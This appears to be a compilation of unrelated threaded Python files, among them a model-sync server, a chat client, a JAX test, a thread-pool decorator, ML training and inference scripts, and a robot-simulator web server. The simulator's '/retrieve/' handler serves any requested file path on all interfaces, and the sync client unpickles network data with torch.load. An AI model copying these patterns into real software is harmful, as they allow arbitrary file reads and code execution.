source | python
|---|---|
server.py
|
import io
import logging
import time
from threading import Lock, Thread
import msgpack
import torch
import zmq
from ptgnn.baseneuralmodel import AbstractNeuralModel
from torch import nn
from .data import ModelSyncData
LOGGER = logging.getLogger(__name__)
class ModelSyncServer:
"""A server storing the latest model and parameters."""
def __init__(self, address: str, model: AbstractNeuralModel, neural_net: nn.Module):
self.__server_address = address
self.__sync_lock = Lock()
self.__current_model_version = time.time()
self.__serialized_model = self.__serialize_model(model, neural_net)
self.__update_nn_params(neural_net)
self.__thread = Thread(target=self.serve, daemon=True, name="model_sync_server")
self.__thread.start()
def __serialize_model(self, model, neural_net) -> bytes:
with io.BytesIO() as sb:
torch.save((model, neural_net), f=sb)
sb.seek(0)
return sb.read()
def update_parameters(self, neural_net: nn.Module) -> None:
with self.__sync_lock:
self.__update_nn_params(neural_net)
def __update_nn_params(self, neural_net: nn.Module):
with io.BytesIO() as sb:
torch.save(neural_net.state_dict(), f=sb)
sb.seek(0)
self.__serialized_params = sb.read()
self.__current_param_version = time.time()
def serve(self):
"""The thread responding to updates."""
context = zmq.Context.instance()
socket = context.socket(zmq.REP)
socket.bind(self.__server_address)
while True:
r_bytes = socket.recv()
client_model_version, client_param_version = msgpack.loads(r_bytes)
with self.__sync_lock:
if client_model_version < self.__current_model_version:
model_update = self.__serialized_model
else:
model_update = None
if (
client_model_version < self.__current_model_version
or client_param_version < self.__current_param_version
):
param_update = self.__serialized_params
else:
param_update = None
returned_data = ModelSyncData(
model_update, self.__current_model_version, param_update, self.__current_param_version
)
socket.send(msgpack.dumps(returned_data))
LOGGER.info("Responded to model update request.")
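# --- Hedged example (not part of the original module): a minimal polling client for
# the server above. The bind address is an assumption, and it assumes ModelSyncData
# round-trips through msgpack as a 4-element sequence in constructor order
# (model_bytes, model_version, param_bytes, param_version), mirroring serve().
def _example_poll_once(address: str = "tcp://localhost:6000",
                       model_version: float = 0.0,
                       param_version: float = 0.0):
    context = zmq.Context.instance()
    socket = context.socket(zmq.REQ)
    socket.connect(address)
    # Tell the server which versions we already have; it answers with any updates.
    socket.send(msgpack.dumps((model_version, param_version)))
    model_bytes, model_version, param_bytes, param_version = msgpack.loads(socket.recv())
    if model_bytes is not None:
        model, neural_net = torch.load(io.BytesIO(model_bytes))  # full (model, nn.Module) pair
    if param_bytes is not None:
        state_dict = torch.load(io.BytesIO(param_bytes))  # apply with neural_net.load_state_dict(...)
    socket.close()
    return model_version, param_version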
|
main.py
|
#!/usr/bin/env pybricks-micropython
from threading import Thread
from ev3_d4 import EV3D4
ev3_d4 = EV3D4()
Thread(target=ev3_d4.color_sensor_loop).start()
Thread(target=ev3_d4.touch_sensor_loop).start()
ev3_d4.main_switch_loop()
|
client.py
|
import socket
import threading
import tkinter
# -- Initialize the GUI with tkinter
root = tkinter.Tk()
root.title("nayutari chat")
root.geometry("400x300")
scrl_frame = tkinter.Frame(root)
scrl_frame.pack()
listbox = tkinter.Listbox(scrl_frame, width=40, height=15)
listbox.pack(side=tkinter.LEFT)
scroll_bar = tkinter.Scrollbar(scrl_frame, command=listbox.yview)
scroll_bar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
listbox.config(yscrollcommand=scroll_bar.set)
input_frame = tkinter.Frame(root)
input_frame.pack()
textbox = tkinter.Entry(input_frame)
textbox.pack(side=tkinter.LEFT)
button = tkinter.Button(input_frame, text="send")
button.pack(side=tkinter.RIGHT)
# Callback invoked when data is received
def on_recv_data(data):
listbox.insert(tkinter.END, data)
listbox.yview_moveto(1)
# -- Set up the network connection
IPADDR = "127.0.0.1"
PORT = 49152
sock = socket.socket(socket.AF_INET)
sock.connect((IPADDR, PORT))
def recv_loop(sock, on_recv_func):
while True:
try:
data = sock.recv(1024)
if data == b"":
break
            # invoke the receive callback
on_recv_func(data.decode("utf-8"))
        except OSError:  # also covers ConnectionResetError
            break
    try:
        sock.shutdown(socket.SHUT_RDWR)
        sock.close()
    except OSError:
        pass  # the socket may already have been closed by the main thread
thread = threading.Thread(target=recv_loop, args=(sock, on_recv_data))
thread.start()
# Callback for the send button click
def on_send_click(sock):
data = textbox.get()
sock.send(data.encode("utf-8"))
textbox.delete(0, tkinter.END)
button.configure(command=lambda:on_send_click(sock))
root.mainloop()
try:
    sock.shutdown(socket.SHUT_RDWR)
    sock.close()
except OSError:
    pass  # the receive thread may have already shut the socket down
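# --- Hedged sketch (not part of the original client): a minimal broadcast server this
# client could talk to. The protocol is assumed from the code above: raw UTF-8 byte
# strings over TCP, with every received message relayed to all connected clients.
def example_broadcast_server(ipaddr="127.0.0.1", port=49152):
    clients = []
    def handle(conn):
        while True:
            try:
                data = conn.recv(1024)
            except OSError:
                break
            if not data:
                break
            for c in list(clients):
                try:
                    c.send(data)
                except OSError:
                    clients.remove(c)
        if conn in clients:
            clients.remove(conn)
        conn.close()
    srv = socket.socket(socket.AF_INET)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((ipaddr, port))
    srv.listen()
    while True:
        conn, _ = srv.accept()
        clients.append(conn)
        threading.Thread(target=handle, args=(conn,), daemon=True).start()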
|
infeed_test.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from absl.testing import absltest
import jax
from jax import lax, numpy as np
from jax.config import config
from jax.lib import xla_client
import jax.test_util
import numpy as onp
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class InfeedTest(jax.test_util.JaxTestCase):
def testInfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray((3, 4), np.float32),))
(z,), _ = lax.infeed(
token, shape=(jax.ShapedArray((3, 1, 1), np.float32),))
return x + y + z
x = onp.float32(1.5)
y = onp.reshape(onp.arange(12, dtype=onp.float32), (3, 4)) # onp.random.randn(3, 4).astype(onp.float32)
z = onp.random.randn(3, 1, 1).astype(onp.float32)
xla_client.transfer_to_infeed((y,))
xla_client.transfer_to_infeed((z,))
self.assertAllClose(f(x), x + y + z, check_dtypes=True)
def testInfeedThenOutfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
token = lax.outfeed(token, y + onp.float32(1))
return lax.tie_in(token, x - 1)
x = onp.float32(7.5)
y = onp.random.randn(3, 4).astype(onp.float32)
execution = threading.Thread(target=lambda: f(x))
execution.start()
xla_client.transfer_to_infeed((y,))
out, = xla_client.transfer_from_outfeed(xla_client.shape_from_pyval((y,)))
execution.join()
self.assertAllClose(out, y + onp.float32(1), check_dtypes=True)
def testInfeedThenOutfeedInALoop(self):
def doubler(_, token):
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
return lax.outfeed(token, y * onp.float32(2))
@jax.jit
def f(n):
token = lax.create_token(n)
token = lax.fori_loop(0, n, doubler, token)
return lax.tie_in(token, n)
n = 10
execution = threading.Thread(target=lambda: f(n))
execution.start()
for _ in range(n):
x = onp.random.randn(3, 4).astype(onp.float32)
xla_client.transfer_to_infeed((x,))
y, = xla_client.transfer_from_outfeed(xla_client.shape_from_pyval((x,)))
self.assertAllClose(y, x * onp.float32(2), check_dtypes=True)
execution.join()
if __name__ == '__main__':
absltest.main()
|
py_vthread.py
|
class pool:
import time,queue,traceback,builtins,functools
from threading import Thread,RLock,current_thread,main_thread
orig_func = {}
_org_print = print
lock = RLock()
class KillThreadParams(Exception): pass
_monitor = None
_monitor_run_num = {}
_pool_queue = {}
_pool_func_num = {}
def __init__(self,pool_num=None,gqueue='v',monitor=True):
if gqueue not in self._pool_queue:
self._pool_queue[gqueue] = pool.queue.Queue()
self._pool = self._pool_queue[gqueue]
pool._patch_print()
if monitor: self.main_monitor()
if gqueue not in self._monitor_run_num:
self._monitor_run_num[gqueue] = pool.queue.Queue()
num = self._auto_pool_num(pool_num)
if gqueue not in self._pool_func_num:
self._pool_func_num[gqueue] = num
self._run(num,gqueue)
else:
if pool_num is not None:
self.change_thread_num(num,gqueue)
def __call__(self,func):
pool.orig_func[func.__name__] = func
@pool.functools.wraps(func)
def _run_threads(*args,**kw): self._pool.put((func,args,kw))
return _run_threads
@classmethod
def change_thread_num(self,num,gqueue='v'):
if gqueue in self._pool_func_num:
x = self._pool_func_num[gqueue] - num
if x < 0: self._run(abs(x),gqueue)
if x > 0: [self._pool_queue[gqueue].put(self.KillThreadParams) for _ in range(abs(x))]
self._pool_func_num[gqueue] = num
@classmethod
def main_monitor(self):
def _func():
while True:
pool.time.sleep(.25)
                if not pool.main_thread().is_alive() and all(map(lambda i:i.empty(),self._monitor_run_num.values())):
self.close_all()
break
if not self._monitor:
self._monitor = pool.Thread(target=_func,name="MainMonitor")
self._monitor.start()
@classmethod
def close_by_gqueue(self,gqueue='v'): self.change_thread_num(0,gqueue)
@classmethod
def close_all(self):
for i in self._pool_func_num: self.change_thread_num(0,i)
@classmethod
def wait(self, gqueue='v'):
while self.check_stop(gqueue): pool.time.sleep(.25)
@classmethod
def check_stop(self, gqueue='v'):
return self._monitor_run_num[gqueue].qsize() or self._pool_queue[gqueue].qsize()
@staticmethod
def atom(func):
def _atom(*arg,**kw):
with pool.lock: return func(*arg,**kw)
return _atom
@staticmethod
def _patch_print(): pool.builtins.print = pool._new_print
@staticmethod
def _new_print(*arg,**kw):
with pool.lock: pool._org_print("[{}]".format(pool.current_thread().getName().center(13)),*arg,**kw)
@staticmethod
def _auto_pool_num(num):
if not num:
try:
from multiprocessing import cpu_count
num = cpu_count()
except:
print("cpu_count error. use default num 4.")
num = 4
return num
@classmethod
def _run(self,num,gqueue):
def _pools_pull():
ct = pool.current_thread()
ct.setName("{}_{}".format(ct.getName(), gqueue))
while True:
v = self._pool_queue[gqueue].get()
if v == self.KillThreadParams: return
try:
func,args,kw = v
self._monitor_run_num[gqueue].put('V')
func(*args,**kw)
except BaseException as e:
print(pool.traceback.format_exc())
finally:
                    self._monitor_run_num[gqueue].get()  # pop the in-flight marker added above
for _ in range(num): pool.Thread(target=_pools_pull).start()
if __name__ == '__main__':
    # A simplified version of the vthread library (a grouped thread-pool decorator):
    # one line of code turns a function into a thread-pool task.
    # The code below exercises the "decorator thread pool"; use it to get familiar
    # with the API before adopting it for real work.
    import time, random
    # Calling a function decorated with pool no longer executes it directly: the call
    # becomes a task submission to the pool, so submitting work never blocks the program.
    # Because of that, functions meant to run in the pool should not rely on return
    # values; collect results through a list or queue owned by the main thread instead.
    @pool(10)  # open a thread-pool group (default name 'v') with 10 threads
    def func1(a,b):
        rd = random.random(); time.sleep(rd)
        print(a+b, '{:.3f}'.format(rd))
    @pool(3,gqueue='h')  # open a thread-pool group named 'h' with 3 threads
    def func2(a,b,c):
        rd = random.random(); time.sleep(rd)
        print(a*b*c, 'hhhhhhh', '{:.3f}'.format(rd))
    for i in range(30): func1(i,i*i)  # submit 30 tasks to see the pools in action
    for i in range(30): func2(i,i+i,3)  # submit 30 tasks to see the pools in action
    print('start wait.')
    pool.wait()  # wait for all func1 tasks in the default gqueue='v' pool group to finish
    pool.wait(gqueue='h')  # wait for all func2 tasks in the gqueue='h' pool group to finish
    print('end wait.')
    # Note: print is automatically replaced by a lock-protected version that prefixes
    # every line with the calling thread's name.
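    # --- Hedged extension of the demo above (not in the original file): exercising
    # pool.atom and pool.change_thread_num, which the class defines but the demo does
    # not use. The names below (results, collect, func3) are illustrative only.
    results = []
    @pool.atom  # serialize access to the shared list with the class-level RLock
    def collect(value):
        results.append(value)
    @pool(2, gqueue='g')  # a third pool group named 'g' with 2 threads
    def func3(x):
        collect(x * x)
    pool.change_thread_num(4, gqueue='g')  # grow the 'g' group from 2 to 4 workers
    for i in range(10): func3(i)
    pool.wait(gqueue='g')
    print('collected', len(results), 'squares')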
|
main_gan_L2_regularized_yelp.py
|
import datetime
import numpy as np
import tensorflow as tf
import threading
import os
from ganrl.common.cmd_args import cmd_args
from ganrl.experiment_user_model.data_utils import Dataset
from ganrl.experiment_user_model.utils import UserModelLSTM, UserModelPW
def multithread_compute_vali():
global vali_sum, vali_cnt
vali_sum = [0.0, 0.0, 0.0, 0.0]
vali_cnt = 0
threads = []
for ii in range(cmd_args.num_thread):
thread = threading.Thread(target=vali_eval, args=(1, ii))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return vali_sum[0]/vali_cnt, vali_sum[1]/vali_cnt, vali_sum[2]/vali_cnt, vali_sum[3]/vali_cnt
def vali_eval(xx, ii):
global vali_sum, vali_cnt
vali_thread_eval = sess.run([train_loss_min_sum, train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt],
feed_dict={user_model.placeholder['clicked_feature']: click_feature_vali[ii],
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_vali[ii],
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_vali[ii], dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_vali[ii], dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_vali[ii], dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_vali[ii]), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_vali[ii], dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_vali[ii],
user_model.placeholder['time']: max_time_vali[ii],
user_model.placeholder['item_size']: news_cnt_short_vali[ii]
})
lock.acquire()
vali_sum[0] += vali_thread_eval[0]
vali_sum[1] += vali_thread_eval[1]
vali_sum[2] += vali_thread_eval[2]
vali_sum[3] += vali_thread_eval[3]
vali_cnt += vali_thread_eval[4]
lock.release()
def multithread_compute_test():
global test_sum, test_cnt
num_sets = cmd_args.num_thread
thread_dist = [[] for _ in range(cmd_args.num_thread)]
for ii in range(num_sets):
thread_dist[ii % cmd_args.num_thread].append(ii)
test_sum = [0.0, 0.0, 0.0, 0.0]
test_cnt = 0
threads = []
for ii in range(cmd_args.num_thread):
thread = threading.Thread(target=test_eval, args=(1, thread_dist[ii]))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return test_sum[0]/test_cnt, test_sum[1]/test_cnt, test_sum[2]/test_cnt, test_sum[3]/test_cnt
def test_eval(xx, thread_dist):
global test_sum, test_cnt
test_thread_eval = [0.0, 0.0, 0.0, 0.0]
test_thread_cnt = 0
for ii in thread_dist:
test_set_eval = sess.run([train_loss_min_sum, train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt],
feed_dict={user_model.placeholder['clicked_feature']: click_feature_test[ii],
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_test[ii],
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_test[ii], dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_test[ii], dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_test[ii], dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_test[ii]), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_test[ii], dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_test[ii],
user_model.placeholder['time']: max_time_test[ii],
user_model.placeholder['item_size']: news_cnt_short_test[ii]
})
test_thread_eval[0] += test_set_eval[0]
test_thread_eval[1] += test_set_eval[1]
test_thread_eval[2] += test_set_eval[2]
test_thread_eval[3] += test_set_eval[3]
test_thread_cnt += test_set_eval[4]
lock.acquire()
test_sum[0] += test_thread_eval[0]
test_sum[1] += test_thread_eval[1]
test_sum[2] += test_thread_eval[2]
test_sum[3] += test_thread_eval[3]
test_cnt += test_thread_cnt
lock.release()
lock = threading.Lock()
if __name__ == '__main__':
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start" % log_time)
dataset = Dataset(cmd_args)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start construct graph" % log_time)
# restore pre-trained u function
user_model = UserModelLSTM(dataset.f_dim, cmd_args, dataset.max_disp_size)
user_model.construct_placeholder()
with tf.variable_scope('model', reuse=False):
user_model.construct_computation_graph_u()
saved_path = cmd_args.save_dir+'/'
saver = tf.train.Saver(max_to_keep=None)
sess = tf.Session()
sess.run(tf.variables_initializer(user_model.min_trainable_variables))
best_save_path = os.path.join(saved_path, 'best-pre1')
saver.restore(sess, best_save_path)
# construct policy net
train_min_opt, train_max_opt, train_loss_min, train_loss_max, train_prec1, train_prec2, train_loss_min_sum, \
train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt = user_model.construct_computation_graph_policy()
sess.run(tf.initialize_variables(user_model.init_variables))
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, graph completed" % log_time)
batch_size = 100
batch = 100
if cmd_args.dataset == 'lastfm':
batch_size = 10
batch = 10
iterations = cmd_args.num_itrs
# prepare validation data
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare vali data" % log_time)
vali_thread_user, size_user_vali, max_time_vali, news_cnt_short_vali, u_t_dispid_vali, \
u_t_dispid_split_ut_vali, u_t_dispid_feature_vali, click_feature_vali, click_sub_index_vali, \
u_t_clickid_vali, ut_dense_vali = dataset.prepare_validation_data_L2(cmd_args.num_thread, dataset.vali_user)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare vali data complete" % log_time)
best_metric = [0.0, 0.0, 0.0, 0.0]
saver = tf.train.Saver(max_to_keep=None)
vali_path = cmd_args.save_dir+'/minmax_L2/'
if not os.path.exists(vali_path):
os.makedirs(vali_path)
for i in range(iterations):
training_user = np.random.choice(len(dataset.train_user), batch, replace=False)
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare train data" % log_time)
size_user_tr, max_time_tr, news_cnt_short_tr, u_t_dispid_tr, u_t_dispid_split_ut_tr, \
u_t_dispid_feature_tr, click_feature_tr, click_sub_index_tr, u_t_clickid_tr, ut_dense_tr = dataset.data_process_for_placeholder_L2(training_user)
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare train data completed" % log_time)
print("%s, start first iteration training" % log_time)
sess.run(train_max_opt, feed_dict={user_model.placeholder['clicked_feature']: click_feature_tr,
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_tr,
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_tr, dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_tr), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_tr, dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_tr,
user_model.placeholder['time']: max_time_tr,
user_model.placeholder['item_size']: news_cnt_short_tr
})
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, first iteration training complete" % log_time)
if np.mod(i, 100) == 0:
loss_prc = sess.run([train_loss_min, train_loss_max, train_prec1, train_prec2], feed_dict={user_model.placeholder['clicked_feature']: click_feature_tr,
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_tr,
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_tr, dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_tr), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_tr, dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_tr,
user_model.placeholder['time']: max_time_tr,
user_model.placeholder['item_size']: news_cnt_short_tr
})
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start first iteration validation" % log_time)
vali_loss_prc = multithread_compute_vali()
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, first iteration validation complete" % log_time)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s: itr%d, training: %.5f, %.5f, %.5f, %.5f, vali: %.5f, %.5f, %.5f, %.5f" %
(log_time, i, loss_prc[0], loss_prc[1], loss_prc[2], loss_prc[3], vali_loss_prc[0], vali_loss_prc[1], vali_loss_prc[2], vali_loss_prc[3]))
if vali_loss_prc[2] > best_metric[2]:
best_metric[2] = vali_loss_prc[2]
best_save_path = os.path.join(vali_path, 'best-pre1')
best_save_path = saver.save(sess, best_save_path)
if vali_loss_prc[3] > best_metric[3]:
best_metric[3] = vali_loss_prc[3]
best_save_path = os.path.join(vali_path, 'best-pre2')
best_save_path = saver.save(sess, best_save_path)
save_path = os.path.join(vali_path, 'most_recent_iter')
save_path = saver.save(sess, save_path)
# test
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare test data" % log_time)
test_thread_user, size_user_test, max_time_test, news_cnt_short_test, u_t_dispid_test, \
u_t_dispid_split_ut_test, u_t_dispid_feature_test, click_feature_test, click_sub_index_test, \
u_t_clickid_test, ut_dense_test = dataset.prepare_validation_data_L2(cmd_args.num_thread, dataset.test_user)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare test data end" % log_time)
best_save_path = os.path.join(vali_path, 'best-pre1')
saver.restore(sess, best_save_path)
test_loss_prc = multithread_compute_test()
vali_loss_prc = multithread_compute_vali()
print("test!!!best-pre1!!!, test: %.5f, vali: %.5f" % (test_loss_prc[2], vali_loss_prc[2]))
best_save_path = os.path.join(vali_path, 'best-pre2')
saver.restore(sess, best_save_path)
test_loss_prc = multithread_compute_test()
vali_loss_prc = multithread_compute_vali()
print("test!!!best-pre2!!!, test: %.5f, vali: %.5f" % (test_loss_prc[3], vali_loss_prc[3]))
|
async_api_multi-threads_multi-requests.py
|
#!/usr/bin/env python3
import cv2
import os
import sys
import time
import numpy as np
from openvino.inference_engine import IENetwork, IEPlugin
from multiprocessing import Process, Queue
import multiprocessing
import threading
import queue
def async_infer_worker(exe_net, request_number, image_queue, input_blob, out_blob):
global start_time
current_request_ids = range(request_number)
next_request_ids = range(request_number, request_number * 2)
done = False
last_batch = -1
infered_images = 0
while True:
buffers = []
for i in range(request_number):
b = image_queue.get()
if type(b) != np.ndarray:
buffers.append(None)
done = True
break
else:
buffers.append(b)
for _request_id in current_request_ids:
if _request_id >= request_number:
if type(buffers[_request_id - request_number]) == np.ndarray:
exe_net.start_async(request_id=_request_id, inputs={input_blob: buffers[_request_id - request_number]})
else:
#print("image at index " + str(_request_id - request_number) + " is none." )
last_batch = _request_id - request_number
break
else:
if type(buffers[_request_id]) == np.ndarray:
exe_net.start_async(request_id=_request_id, inputs={input_blob: buffers[_request_id]})
else:
#print("image at index " + str(_request_id) + " is none." )
last_batch = _request_id
break
for _request_id in next_request_ids:
if exe_net.requests[_request_id].wait(-1) == 0:
res = exe_net.requests[_request_id].outputs[out_blob]
infered_images = infered_images + 1
#print("infer result: label:%f confidence:%f left:%f top:%f right:%f bottom:%f" %(res[0][0][0][1], res[0][0][0][2], res[0][0][0][3], res[0][0][0][4], res[0][0][0][5], res[0][0][0][6]))
duration = time.time() - start_time
print("inferred images: " + str(infered_images) + ", average fps: " + str(infered_images/duration) +"\r", end = '', flush = False)
current_request_ids, next_request_ids = next_request_ids, current_request_ids
for i in range(len(buffers)):
image_queue.task_done()
if done:
break
# 'last_batch' more inference results remain to check
buffer_index = 0
for _request_id in next_request_ids:
if(buffer_index >= last_batch):
break
buffer_index = buffer_index + 1
if exe_net.requests[_request_id].wait(-1) == 0:
res = exe_net.requests[_request_id].outputs[out_blob]
infered_images = infered_images + 1
#print("infer result: label:%f confidence:%f left:%f top:%f right:%f bottom:%f" %(res[0][0][0][1], res[0][0][0][2], res[0][0][0][3], res[0][0][0][4], res[0][0][0][5], res[0][0][0][6]))
duration = time.time() - start_time
print("inferred images: " + str(infered_images) + ", average fps: " + str(infered_images/duration) +"\r", end = '', flush = False)
# for test purpose only
image_number = 200
def preprocess_worker(image_queue, n, c, h, w):
for i in range(1, 1 + image_number):
image = cv2.imread("/opt/intel/computer_vision_sdk/deployment_tools/demo/car.png")
image = cv2.resize(image, (w, h))
image = image.transpose((2, 0, 1))
image = image.reshape((n, c, h, w))
image_queue.put(image)
image_queue.put(None)
start_time = -1
# ./async_api_multi-threads_multi-requests.py <request number>
def main():
global start_time
    # the number of simultaneous inference requests is given on the command line
request_number = int(sys.argv[1])
image_queue = queue.Queue(maxsize= request_number*3)
model_dir = os.environ['HOME'] + "/model_downloader/object_detection/common/mobilenet-ssd/caffe/FP16/"
model_xml = model_dir + "mobilenet-ssd.xml"
model_bin = model_dir + "mobilenet-ssd.bin"
plugin = IEPlugin(device="MYRIAD")
net = IENetwork(model=model_xml, weights=model_bin)
input_blob = next(iter(net.inputs))
out_blob = next(iter(net.outputs))
n, c, h, w = net.inputs[input_blob].shape
exec_net = plugin.load(network=net, num_requests=request_number*2)
start_time = time.time()
preprocess_thread = None
preprocess_thread = threading.Thread(target=preprocess_worker, args=(image_queue, n, c, h, w))
preprocess_thread.start()
async_infer_worker(exec_net, request_number, image_queue, input_blob, out_blob)
preprocess_thread.join()
print()
del exec_net
del net
del plugin
if __name__ == '__main__':
sys.exit(main() or 0)
|
SwiftRoute.py
|
#!/usr/bin/env python
"""
@author Jesse Haviland
"""
import swift as sw
import websockets
import asyncio
from threading import Thread
import webbrowser as wb
import json
import http.server
import socketserver
from pathlib import Path
import os
from queue import Empty
from http import HTTPStatus
import urllib
def start_servers(
outq, inq, stop_servers, open_tab=True,
browser=None, dev=False):
# Start our websocket server with a new clean port
socket = Thread(
target=SwiftSocket, args=(outq, inq, stop_servers, ), daemon=True)
socket.start()
socket_port = inq.get()
if not dev:
# Start a http server
server = Thread(
target=SwiftServer,
args=(outq, inq, socket_port, stop_servers, ),
daemon=True)
server.start()
server_port = inq.get()
if open_tab:
if browser is not None:
try:
wb.get(browser).open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
except wb.Error:
print(
'\nCould not open specified browser, '
'using default instead\n')
wb.open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
else:
wb.open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
else:
server = None
wb.get(browser).open_new_tab(
'http://localhost:'
+ str(3000)
+ '/?'
+ str(socket_port))
try:
inq.get(timeout=10)
except Empty:
print('\nCould not connect to the Swift simulator \n')
raise
return socket, server
class SwiftSocket:
def __init__(self, outq, inq, run):
self.run = run
self.outq = outq
self.inq = inq
self.USERS = set()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
started = False
# port = 8080
# start_server = websockets.serve(self.serve, "localhost", port)
# self.loop.run_until_complete(start_server)
port = 53000
while not started and port < 62000:
try:
start_server = websockets.serve(self.serve, "localhost", port)
self.loop.run_until_complete(start_server)
started = True
except OSError:
port += 1
self.inq.put(port)
self.loop.run_forever()
async def register(self, websocket):
self.USERS.add(websocket)
async def serve(self, websocket, path):
# Initial connection handshake
        await self.register(websocket)
        received = await websocket.recv()
        self.inq.put(received)
        # Now onto the send/receive cycle
while self.run():
message = await self.producer()
expected = message[0]
msg = message[1]
await websocket.send(json.dumps(msg))
if expected:
                received = await websocket.recv()
                self.inq.put(received)
return
async def producer(self):
data = self.outq.get()
return data
class SwiftServer:
def __init__(
self, outq, inq, socket_port, run,
verbose=False, custom_root=None):
server_port = 52000
self.inq = inq
self.run = run
root_dir = Path(sw.__file__).parent / 'out'
print(root_dir)
class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super(MyHttpRequestHandler, self).__init__(*args, directory=str(root_dir), **kwargs)
def log_message(self, format, *args):
if verbose:
http.server.SimpleHTTPRequestHandler.log_message(
self, format, *args)
else:
pass
def do_POST(self):
print(self)
def do_GET(self):
# home = str(Path.home())
if self.path == '/':
self.send_response(301)
self.send_header(
'Location', 'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
self.end_headers()
return
elif self.path == '/?' + str(socket_port):
self.path = 'index.html'
elif self.path.startswith("/retrieve/"):
# print(f"Retrieving file: {self.path[10:]}")
self.path = urllib.parse.unquote(self.path[10:])
self.send_file_via_real_path()
return
self.path = Path(self.path).as_posix()
http.server.SimpleHTTPRequestHandler.do_GET(self)
def send_file_via_real_path(self):
try:
f = open(self.path, 'rb')
except OSError:
self.send_error(HTTPStatus.NOT_FOUND, "File not found")
return None
ctype = self.guess_type(self.path)
try:
fs = os.fstat(f.fileno())
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", ctype)
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified",
self.date_time_string(fs.st_mtime))
self.end_headers()
self.copyfile(f, self.wfile)
finally:
f.close()
Handler = MyHttpRequestHandler
connected = False
while not connected and server_port < 62000:
try:
with socketserver.TCPServer(
("", server_port), Handler) as httpd:
self.inq.put(server_port)
connected = True
# while self.run():
# httpd.handle_request
httpd.serve_forever()
except OSError:
server_port += 1
|
POPListener.py
|
import logging
